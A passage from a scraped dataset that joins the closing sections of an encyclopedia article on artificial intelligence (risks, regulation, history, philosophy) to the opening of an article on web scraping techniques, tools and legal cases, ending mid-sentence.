then uses these predictions as recommendations, some of these "recommendations" will likely be racist. 211 Thus, machine learning is not well suited to help make decisions in areas where there is hope that the future will be better than the past. It is descriptive rather than prescriptive. l Bias and unfairness may go undetected because the developers are overwhelmingly white and male: among AI engineers, about 4% are black and 20% are women. 204 At its 2022 Conference on Fairness, Accountability, and Transparency (ACM FAccT 2022), the Association for Computing Machinery, in Seoul, South Korea, presented and published findings that recommend that until AI and robotics systems are demonstrated to be free of bias mistakes, they are unsafe, and the use of self-learning neural networks trained on vast, unregulated sources of flawed internet data should be curtailed. dubious discuss 213 Many AI systems are so complex that their designers cannot explain how they reach their decisions. 214 Particularly with deep neural networks, in which there are a large amount of non-linear relationships between inputs and outputs. But some popular explainability techniques exist. 215 It is impossible to be certain that a program is operating correctly if no one knows how exactly it works. There have been many cases where a machine learning program passed rigorous tests, but nevertheless learned something different than what the programmers intended. For example, a system that could identify skin diseases better than medical professionals was found to actually have a strong tendency to classify images with a ruler as "cancerous", because pictures of malignancies typically include a ruler to show the scale. 216 Another machine learning system designed to help effectively allocate medical resources was found to classify patients with asthma as being at "low risk" of dying from pneumonia. Having asthma is actually a severe risk factor, but since the patients having asthma would usually get much more medical care, they were relatively unlikely to die according to the training data. The correlation between asthma and low risk of dying from pneumonia was real, but misleading. 217 People who have been harmed by an algorithm's decision have a right to an explanation. 218 Doctors, for example, are expected to clearly and completely explain to their colleagues the reasoning behind any decision they make. Early drafts of the European Union's General Data Protection Regulation in 2016 included an explicit statement that this right exists. m Industry experts noted that this is an unsolved problem with no solution in sight. Regulators argued that nevertheless the harm is real: if the problem has no solution, the tools should not be used. 219 DARPA established the XAI ("Explainable Artificial Intelligence") program in 2014 to try and solve these problems. 220 Several approaches aim to address the transparency problem. SHAP enables to visualise the contribution of each feature to the output. 221 LIME can locally approximate a model's outputs with a simpler, interpretable model. 222 Multitask learning provides a large number of outputs in addition to the target classification. These other outputs can help developers deduce what the network has learned. 223 Deconvolution, DeepDream and other generative methods can allow developers to see what different layers of a deep network for computer vision have learned, and produce output that can suggest what the network is learning. 224 For generative pre-trained transformers, Anthropic developed a technique based on dictionary learning that associates patterns of neuron activations with human-understandable concepts. 225 Artificial intelligence provides a number of tools that are useful to bad actors, such as authoritarian governments, terrorists, criminals or rogue states. A lethal autonomous weapon is a machine that locates, selects and engages human targets without human supervision. n Widely available AI tools can be used by bad actors to develop inexpensive autonomous weapons and, if produced at scale, they are potentially weapons of mass destruction. 227 Even when used in conventional warfare, it is unlikely that they will be unable to reliably choose targets and could potentially kill an innocent person. 227 In 2014, 30 nations (including China) supported a ban on autonomous weapons under the United Nations' Convention on Certain Conventional Weapons, however the United States and others disagreed. 228 By 2015, over fifty countries were reported to be researching battlefield robots. 229 AI tools make it easier for authoritarian governments to efficiently control their citizens in several ways. Face and voice recognition allow widespread surveillance. Machine learning, operating this data, can classify potential enemies of the state and prevent them from hiding. Recommendation systems can precisely target propaganda and misinformation for maximum effect. Deepfakes and generative AI aid in producing misinformation. Advanced AI can make authoritarian centralized decision making more competitive than liberal and decentralized systems such as markets. It lowers the cost and difficulty of digital warfare and advanced spyware. 230 All these technologies have been available since 2020 or earlier—AI facial recognition systems are already being used for mass surveillance in China. 231 232 There many other ways that AI is expected to help bad actors, some of which can not be foreseen. For example, machine-learning AI is able to design tens of thousands of toxic molecules in a matter of hours. 233 Economists have frequently highlighted the risks of redundancies from AI, and speculated about unemployment if there is no adequate social policy for full employment. 234 In the past, technology has tended to increase rather than reduce total employment, but economists acknowledge that "we're in uncharted territory" with AI. 235 A survey of economists showed disagreement about whether the increasing use of robots and AI will cause a substantial increase in long-term unemployment, but they generally agree that it could be a net benefit if productivity gains are redistributed. 236 Risk estimates vary; for example, in the 2010s, Michael Osborne and Carl Benedikt Frey estimated 47% of U.S. jobs are at "high risk" of potential automation, while an OECD report classified only 9% of U.S. jobs as "high risk". o 238 The methodology of speculating about future employment levels has been criticised as lacking evidential foundation, and for implying that technology, rather than social policy, creates unemployment, as opposed to redundancies. 234 In April 2023, it was reported that 70% of the jobs for Chinese video game illustrators had been eliminated by generative artificial intelligence. 239 240 Unlike previous waves of automation, many middle-class jobs may be eliminated by artificial intelligence; The Economist stated in 2015 that "the worry that AI could do to white-collar jobs what steam power did to blue-collar ones during the Industrial Revolution" is "worth taking seriously". 241 Jobs at extreme risk range from paralegals to fast food cooks, while job demand is likely to increase for care-related professions ranging from personal healthcare to the clergy. 242 From the early days of the development of artificial intelligence, there have been arguments, for example, those put forward by Joseph Weizenbaum, about whether tasks that can be done by computers actually should be done by them, given the difference between computers and humans, and between quantitative calculation and qualitative, value-based judgement. 243 It has been argued AI will become so powerful that humanity may irreversibly lose control of it. This could, as physicist Stephen Hawking stated, "spell the end of the human race". 244 This scenario has been common in science fiction, when a computer or robot suddenly develops a human-like "self-awareness" (or "sentience" or "consciousness") and becomes a malevolent character. p These sci-fi scenarios are misleading in several ways. First, AI does not require human-like "sentience" to be an existential risk. Modern AI programs are given specific goals and use learning and intelligence to achieve them. Philosopher Nick Bostrom argued that if one gives almost any goal to a sufficiently powerful AI, it may choose to destroy humanity to achieve it (he used the example of a paperclip factory manager). 246 Stuart Russell gives the example of household robot that tries to find a way to kill its owner to prevent it from being unplugged, reasoning that "you can't fetch the coffee if you're dead. 247 In order to be safe for humanity, a superintelligence would have to be genuinely aligned with humanity's morality and values so that it is "fundamentally on our side". 248 Second, Yuval Noah Harari argues that AI does not require a robot body or physical control to pose an existential risk. The essential parts of civilization are not physical. Things like ideologies, law, government, money and the economy are made of language; they exist because there are stories that billions of people believe. The current prevalence of misinformation suggests that an AI could use language to convince people to believe anything, even to take actions that are destructive. 249 The opinions amongst experts and industry insiders are mixed, with sizable fractions both concerned and unconcerned by risk from eventual superintelligent AI. 250 Personalities such as Stephen Hawking, Bill Gates, and Elon Musk, 251 as well as AI pioneers such as Yoshua Bengio, Stuart Russell, Demis Hassabis, and Sam Altman, have expressed concerns about existential risk from AI. In May 2023, Geoffrey Hinton announced his resignation from Google in order to be able to "freely speak out about the risks of AI" without "considering how this impacts Google. 252 He notably mentioned risks of an AI takeover, 253 and stressed that in order to avoid the worst outcomes, establishing safety guidelines will require cooperation among those competing in use of AI. 254 In 2023, many leading AI experts issued the joint statement that "Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war". 255 Other researchers, however, spoke in favor of a less dystopian view. AI pioneer Juergen Schmidhuber did not sign the joint statement, emphasising that in 95% of all cases, AI research is about making "human lives longer and healthier and easier. 256 While the tools that are now being used to improve lives can also be used by bad actors, "they can also be used against the bad actors. 257 258 Andrew Ng also argued that "it's a mistake to fall for the doomsday hype on AI—and that regulators who do will only benefit vested interests. 259 Yann LeCun "scoffs at his peers' dystopian scenarios of supercharged misinformation and even, eventually, human extinction. 260 In the early 2010s, experts argued that the risks are too distant in the future to warrant research or that humans will be valuable from the perspective of a superintelligent machine. 261 However, after 2016, the study of current and future risks and possible solutions became a serious area of research. 262 Friendly AI are machines that have been designed from the beginning to minimize risks and to make choices that benefit humans. Eliezer Yudkowsky, who coined the term, argues that developing friendly AI should be a higher research priority: it may require a large investment and it must be completed before AI becomes an existential risk. 263 Machines with intelligence have the potential to use their intelligence to make ethical decisions. The field of machine ethics provides machines with ethical principles and procedures for resolving ethical dilemmas. 264 The field of machine ethics is also called computational morality, 264 and was founded at an AAAI symposium in 2005. 265 Other approaches include Wendell Wallach's "artificial moral agents" 266 and Stuart J. Russell's three principles for developing provably beneficial machines. 267 Active organizations in the AI open-source community include Hugging Face, 268 Google, 269 EleutherAI and Meta. 270 Various AI models, such as Llama 2, Mistral or Stable Diffusion, have been made open-weight, 271 272 meaning that their architecture and trained parameters (the "weights") are publicly available. Open-weight models can be freely fine-tuned, which allows companies to specialize them with their own data and for their own use-case. 273 Open-weight models are useful for research and innovation but can also be misused. Since they can be fine-tuned, any built-in security measure, such as objecting to harmful requests, can be trained away until it becomes ineffective. Some researchers warn that future AI models may develop dangerous capabilities (such as the potential to drastically facilitate bioterrorism) and that once released on the Internet, they can't be deleted everywhere if needed. They recommend pre-release audits and cost-benefit analyses. 274 Artificial Intelligence projects can have their ethical permissibility tested while designing, developing, and implementing an AI system. An AI framework such as the Care and Act Framework containing the SUM values—developed by the Alan Turing Institute tests projects in four main areas: 275 276 Other developments in ethical frameworks include those decided upon during the Asilomar Conference, the Montreal Declaration for Responsible AI, and the IEEE's Ethics of Autonomous Systems initiative, among others; 277 however, these principles do not go without their criticisms, especially regards to the people chosen contributes to these frameworks. 278 Promotion of the wellbeing of the people and communities that these technologies affect requires consideration of the social and ethical implications at all stages of AI system design, development and implementation, and collaboration between job roles such as data scientists, product managers, data engineers, domain experts, and delivery managers. 279 The UK AI Safety Institute released in 2024 a testing toolset called 'Inspect' for AI safety evaluations available under a MIT open-source licence which is freely available on GitHub and can be improved with third-party packages. It can be used to evaluate AI models in a range of areas including core knowledge, ability to reason, and autonomous capabilities. 280 The regulation of artificial intelligence is the development of public sector policies and laws for promoting and regulating AI; it is therefore related to the broader regulation of algorithms. 281 The regulatory and policy landscape for AI is an emerging issue in jurisdictions globally. 282 According to AI Index at Stanford, the annual number of AI-related laws passed in the 127 survey countries jumped from one passed in 2016 to 37 passed in 2022 alone. 283 284 Between 2016 and 2020, more than 30 countries adopted dedicated strategies for AI. 285 Most EU member states had released national AI strategies, as had Canada, China, India, Japan, Mauritius, the Russian Federation, Saudi Arabia, United Arab Emirates, U.S., and Vietnam. Others were in the process of elaborating their own AI strategy, including Bangladesh, Malaysia and Tunisia. 285 The Global Partnership on Artificial Intelligence was launched in June 2020, stating a need for AI to be developed in accordance with human rights and democratic values, to ensure public confidence and trust in the technology. 285 Henry Kissinger, Eric Schmidt, and Daniel Huttenlocher published a joint statement in November 2021 calling for a government commission to regulate AI. 286 In 2023, OpenAI leaders published recommendations for the governance of superintelligence, which they believe may happen in less than 10 years. 287 In 2023, the United Nations also launched an advisory body to provide recommendations on AI governance; the body comprises technology company executives, governments officials and academics. 288 In a 2022 Ipsos survey, attitudes towards AI varied greatly by country; 78% of Chinese citizens, but only 35% of Americans, agreed that "products and services using AI have more benefits than drawbacks". 283 A 2023 Reuters Ipsos poll found that 61% of Americans agree, and 22% disagree, that AI poses risks to humanity. 289 In a 2023 Fox News poll, 35% of Americans thought it "very important", and an additional 41% thought it "somewhat important", for the federal government to regulate AI, versus 13% responding "not very important" and 8% responding "not at all important". 290 291 In November 2023, the first global AI Safety Summit was held in Bletchley Park in the UK to discuss the near and far term risks of AI and the possibility of mandatory and voluntary regulatory frameworks. 292 28 countries including the United States, China, and the European Union issued a declaration at the start of the summit, calling for international co-operation to manage the challenges and risks of artificial intelligence. 293 294 In May 2024 at the AI Seoul Summit, 16 global AI tech companies agreed to safety commitments on the development of AI. 295 296 The study of mechanical or "formal" reasoning began with philosophers and mathematicians in antiquity. The study of logic led directly to Alan Turing's theory of computation, which suggested that a machine, by shuffling symbols as simple as "0" and "1", could simulate any conceivable form of mathematical reasoning. 297 4 This, along with concurrent discoveries in cybernetics, information theory and neurobiology, led researchers to consider the possibility of building an "electronic brain". q They developed several areas of research that would become part of AI, 299 such as McCullouch and Pitts design for "artificial neurons" in 1943, 119 and Turing's influential 1950 paper 'Computing Machinery and Intelligence', which introduced the Turing test and showed that "machine intelligence" was plausible. 300 4 The field of AI research was founded at a workshop at Dartmouth College in 1956. r 5 The attendees became the leaders of AI research in the 1960s. s They and their students produced programs that the press described as "astonishing": t computers were learning checkers strategies, solving word problems in algebra, proving logical theorems and speaking English. u 8 Artificial intelligence laboratories were set up at a number of British and U.S. universities in the latter 1950s and early 1960s. 4 Researchers in the 1960s and the 1970s were convinced that their methods would eventually succeed in creating a machine with general intelligence and considered this the goal of their field. 304 In 1965 Herbert Simon predicted, "machines will be capable, within twenty years, of doing any work a man can do". 305 In 1967 Marvin Minsky agreed, writing, "within a generation ... the problem of creating 'artificial intelligence' will substantially be solved". 306 They had, however, underestimated the difficulty of the problem. v In 1974, both the U.S. and British governments cut off exploratory research in response to the criticism of Sir James Lighthill 308 and ongoing pressure from the U.S. Congress to fund more productive projects. 309 Minsky's and Papert's book Perceptrons was understood as proving that artificial neural networks would never be useful for solving real-world tasks, thus discrediting the approach altogether. 310 The "AI winter", a period when obtaining funding for AI projects was difficult, followed. 10 In the early 1980s, AI research was revived by the commercial success of expert systems, 311 a form of AI program that simulated the knowledge and analytical skills of human experts. By 1985, the market for AI had reached over a billion dollars. At the same time, Japan's fifth generation computer project inspired the U.S. and British governments to restore funding for academic research. 9 However, beginning with the collapse of the Lisp Machine market in 1987, AI once again fell into disrepute, and a second, longer-lasting winter began. 11 Up to this point, most of AI's funding had gone to projects that used high-level symbols to represent mental objects like plans, goals, beliefs, and known facts. In the 1980s, some researchers began to doubt that this approach would be able to imitate all the processes of human cognition, especially perception, robotics, learning and pattern recognition, 312 and began to look into "sub-symbolic" approaches. 313 Rodney Brooks rejected "representation" in general and focussed directly on engineering machines that move and survive. w Judea Pearl, Lofti Zadeh and others developed methods that handled incomplete and uncertain information by making reasonable guesses rather than precise logic. 90 318 But the most important development was the revival of "connectionism", including neural network research, by Geoffrey Hinton and others. 319 In 1990, Yann LeCun successfully showed that convolutional neural networks can recognize handwritten digits, the first of many successful applications of neural networks. 320 AI gradually restored its reputation in the late 1990s and early 21st century by exploiting formal mathematical methods and by finding specific solutions to specific problems. This "narrow" and "formal" focus allowed researchers to produce verifiable results and collaborate with other fields (such as statistics, economics and mathematics). 321 By 2000, solutions developed by AI researchers were being widely used, although in the 1990s they were rarely described as "artificial intelligence". 322 However, several academic researchers became concerned that AI was no longer pursuing its original goal of creating versatile, fully intelligent machines. Beginning around 2002, they founded the subfield of artificial general intelligence (or "AGI"), which had several well-funded institutions by the 2010s. 15 Deep learning began to dominate industry benchmarks in 2012 and was adopted throughout the field. 12 For many specific tasks, other methods were abandoned. x Deep learning's success was based on both hardware improvements (faster computers, 324 graphics processing units, cloud computing 325 ) and access to large amounts of data 326 (including curated datasets, 325 such as ImageNet). Deep learning's success led to an enormous increase in interest and funding in AI. y The amount of machine learning research (measured by total publications) increased by 50% in the years 2015 2019. 285 In 2016, issues of fairness and the misuse of technology were catapulted into center stage at machine learning conferences, publications vastly increased, funding became available, and many researchers re-focussed their careers on these issues. The alignment problem became a serious field of academic study. 262 In the late teens and early 2020s, AGI companies began to deliver programs that created enormous interest. In 2015, AlphaGo, developed by DeepMind, beat the world champion Go player. The program was taught only the rules of the game and developed strategy by itself. GPT 3 is a large language model that was released in 2020 by OpenAI and is capable of generating high-quality human-like text. 327 These programs, and others, inspired an aggressive AI boom, where large companies began investing billions in AI research. According to AI Impacts, about $50 billion annually was invested in "AI" around 2022 in the U.S. alone and about 20% of the new U.S. Computer Science PhD graduates have specialized in "AI". 328 About 800,000 "AI" related U.S. job openings existed in 2022. 329 Alan Turing wrote in 1950 "I propose to consider the question 'can machines think'? 330 He advised changing the question from whether a machine "thinks", to "whether or not it is possible for machinery to show intelligent behaviour". 330 He devised the Turing test, which measures the ability of a machine to simulate human conversation. 300 Since we can only observe the behavior of the machine, it does not matter if it is "actually" thinking or literally has a "mind". Turing notes that we can not determine these things about other people but "it is usual to have a polite convention that everyone thinks. 331 Russell and Norvig agree with Turing that intelligence must be defined in terms of external behavior, not internal structure. 1 However, they are critical that the test requires the machine to imitate humans. "Aeronautical engineering texts, they wrote, "do not define the goal of their field as making 'machines that fly so exactly like pigeons that they can fool other pigeons. 332 AI founder John McCarthy agreed, writing that "Artificial intelligence is not, by definition, simulation of human intelligence". 333 McCarthy defines intelligence as "the computational part of the ability to achieve goals in the world". 334 Another AI founder, Marvin Minsky similarly describes it as "the ability to solve hard problems". 335 The leading AI textbook defines it as the study of agents that perceive their environment and take actions that maximize their chances of achieving defined goals. 1 These definitions view intelligence in terms of well-defined problems with well-defined solutions, where both the difficulty of the problem and the performance of the program are direct measures of the "intelligence" of the machine—and no other philosophical discussion is required, or may not even be possible. Another definition has been adopted by Google, 336 a major practitioner in the field of AI. This definition stipulates the ability of systems to synthesize information as the manifestation of intelligence, similar to the way it is defined in biological intelligence. Some authors have suggested in practice, that the definition of AI is vague and difficult to define, with contention as to whether classical algorithms should be categorised as AI, 337 with many companies during the early 2020s AI boom using the term as a marketing buzzword, often even if they did "not actually use AI in a material way". 338 No established unifying theory or paradigm has guided AI research for most of its history. z The unprecedented success of statistical machine learning in the 2010s eclipsed all other approaches (so much so that some sources, especially in the business world, use the term "artificial intelligence" to mean "machine learning with neural networks"). This approach is mostly sub-symbolic, soft and narrow. Critics argue that these questions may have to be revisited by future generations of AI researchers. Symbolic AI (or "GOFAI") 340 simulated the high-level conscious reasoning that people use when they solve puzzles, express legal reasoning and do mathematics. They were highly successful at "intelligent" tasks such as algebra or IQ tests. In the 1960s, Newell and Simon proposed the physical symbol systems hypothesis: "A physical symbol system has the necessary and sufficient means of general intelligent action. 341 However, the symbolic approach failed on many tasks that humans solve easily, such as learning, recognizing an object or commonsense reasoning. Moravec's paradox is the discovery that high-level "intelligent" tasks were easy for AI, but low level "instinctive" tasks were extremely difficult. 342 Philosopher Hubert Dreyfus had argued since the 1960s that human expertise depends on unconscious instinct rather than conscious symbol manipulation, and on having a "feel" for the situation, rather than explicit symbolic knowledge. 343 Although his arguments had been ridiculed and ignored when they were first presented, eventually, AI research came to agree with him. aa 20 The issue is not resolved: sub-symbolic reasoning can make many of the same inscrutable mistakes that human intuition does, such as algorithmic bias. Critics such as Noam Chomsky argue continuing research into symbolic AI will still be necessary to attain general intelligence, 345 346 in part because sub-symbolic AI is a move away from explainable AI: it can be difficult or impossible to understand why a modern statistical AI program made a particular decision. The emerging field of neuro-symbolic artificial intelligence attempts to bridge the two approaches. "Neats" hope that intelligent behavior is described using simple, elegant principles (such as logic, optimization, or neural networks). "Scruffies" expect that it necessarily requires solving a large number of unrelated problems. Neats defend their programs with theoretical rigor, scruffies rely mainly on incremental testing to see if they work. This issue was actively discussed in the 1970s and 1980s, 347 but eventually was seen as irrelevant. Modern AI has elements of both. Finding a provably correct or optimal solution is intractable for many important problems. 19 Soft computing is a set of techniques, including genetic algorithms, fuzzy logic and neural networks, that are tolerant of imprecision, uncertainty, partial truth and approximation. Soft computing was introduced in the late 1980s and most successful AI programs in the 21st century are examples of soft computing with neural networks. AI researchers are divided as to whether to pursue the goals of artificial general intelligence and superintelligence directly or to solve as many specific problems as possible (narrow AI) in hopes these solutions will lead indirectly to the field's long-term goals. 348 349 General intelligence is difficult to define and difficult to measure, and modern AI has had more verifiable successes by focusing on specific problems with specific solutions. The experimental sub-field of artificial general intelligence studies this area exclusively. The philosophy of mind does not know whether a machine can have a mind, consciousness and mental states, in the same sense that human beings do. This issue considers the internal experiences of the machine, rather than its external behavior. Mainstream AI research considers this issue irrelevant because it does not affect the goals of the field: to build machines that can solve problems using intelligence. Russell and Norvig add that t he additional project of making a machine conscious in exactly the way humans are is not one that we are equipped to take on. 350 However, the question has become central to the philosophy of mind. It is also typically the central question at issue in artificial intelligence in fiction. David Chalmers identified two problems in understanding the mind, which he named the "hard" and "easy" problems of consciousness. 351 The easy problem is understanding how the brain processes signals, makes plans and controls behavior. The hard problem is explaining how this feels or why it should feel like anything at all, assuming we are right in thinking that it truly does feel like something (Dennett's consciousness illusionism says this is an illusion). While human information processing is easy to explain, human subjective experience is difficult to explain. For example, it is easy to imagine a color-blind person who has learned to identify which objects in their field of view are red, but it is not clear what would be required for the person to know what red looks like. 352 Computationalism is the position in the philosophy of mind that the human mind is an information processing system and that thinking is a form of computing. Computationalism argues that the relationship between mind and body is similar or identical to the relationship between software and hardware and thus may be a solution to the mind body problem. This philosophical position was inspired by the work of AI researchers and cognitive scientists in the 1960s and was originally proposed by philosophers Jerry Fodor and Hilary Putnam. 353 Philosopher John Searle characterized this position as "strong AI": "The appropriately programmed computer with the right inputs and outputs would thereby have a mind in exactly the same sense human beings have minds. ab Searle counters this assertion with his Chinese room argument, which attempts to show that, even if a machine perfectly simulates human behavior, there is still no reason to suppose it also has a mind. 357 It is difficult or impossible to reliably evaluate whether an advanced AI is sentient (has the ability to feel), and if so, to what degree. 358 But if there is a significant chance that a given machine can feel and suffer, then it may be entitled to certain rights or welfare protection measures, similarly to animals. 359 360 Sapience (a set of capacities related to high intelligence, such as discernment or self-awareness) may provide another moral basis for AI rights. 359 Robot rights are also sometimes proposed as a practical way to integrate autonomous agents into society. 361 In 2017, the European Union considered granting "electronic personhood" to some of the most capable AI systems. Similarly to the legal status of companies, it would have conferred rights but also responsibilities. 362 Critics argued in 2018 that granting rights to AI systems would downplay the importance of human rights, and that legislation should focus on user needs rather than speculative futuristic scenarios. They also noted that robots lacked the autonomy to take part to society on their own. 363 364 Progress in AI increased interest in the topic. Proponents of AI welfare and rights often argue that AI sentience, if it emerges, would be particularly easy to deny. They warn that this may be a moral blind spot analogous to slavery or factory farming, which could lead to large-scale suffering if sentient AI is created and carelessly exploited. 360 359 A superintelligence is a hypothetical agent that would possess intelligence far surpassing that of the brightest and most gifted human mind. 349 If research into artificial general intelligence produced sufficiently intelligent software, it might be able to reprogram and improve itself. The improved software would be even better at improving itself, leading to what I. J. Good called an "intelligence explosion" and Vernor Vinge called a "singularity". 365 However, technologies cannot improve exponentially indefinitely, and typically follow an S-shaped curve, slowing when they reach the physical limits of what the technology can do. 366 Robot designer Hans Moravec, cyberneticist Kevin Warwick, and inventor Ray Kurzweil have predicted that humans and machines will merge in the future into cyborgs that are more capable and powerful than either. This idea, called transhumanism, has roots in Aldous Huxley and Robert Ettinger. 367 Edward Fredkin argues that "artificial intelligence is the next stage in evolution", an idea first proposed by Samuel Butler's "Darwin among the Machines" as far back as 1863, and expanded upon by George Dyson in his 1998 book Darwin Among the Machines: The Evolution of Global Intelligence. 368 Thought-capable artificial beings have appeared as storytelling devices since antiquity, 369 and have been a persistent theme in science fiction. 370 A common trope in these works began with Mary Shelley's Frankenstein, where a human creation becomes a threat to its masters. This includes such works as Arthur C. Clarke's and Stanley Kubrick's 2001: A Space Odyssey (both 1968), with HAL 9000, the murderous computer in charge of the Discovery One spaceship, as well as The Terminator (1984) and The Matrix (1999). In contrast, the rare loyal robots such as Gort from The Day the Earth Stood Still (1951) and Bishop from Aliens (1986) are less prominent in popular culture. 371 Isaac Asimov introduced the Three Laws of Robotics in many stories, most notably with the "Multivac" super-intelligent computer. Asimov's laws are often brought up during lay discussions of machine ethics; 372 while almost all artificial intelligence researchers are familiar with Asimov's laws through popular culture, they generally consider the laws useless for many reasons, one of which is their ambiguity. 373 Several works use AI to force us to confront the fundamental question of what makes us human, showing us artificial beings that have the ability to feel, and thus to suffer. This appears in Karel apek's R.U.R., the films A.I. Artificial Intelligence and Ex Machina, as well as the novel Do Androids Dream of Electric Sheep?, by Philip K. Dick. Dick considers the idea that our understanding of human subjectivity is altered by technology created with artificial intelligence. 374 The two most widely used textbooks in 2023 (see the Open Syllabus): These were the four of the most widely used AI textbooks in 2008: Later editions: |
595 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#European_Union | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and 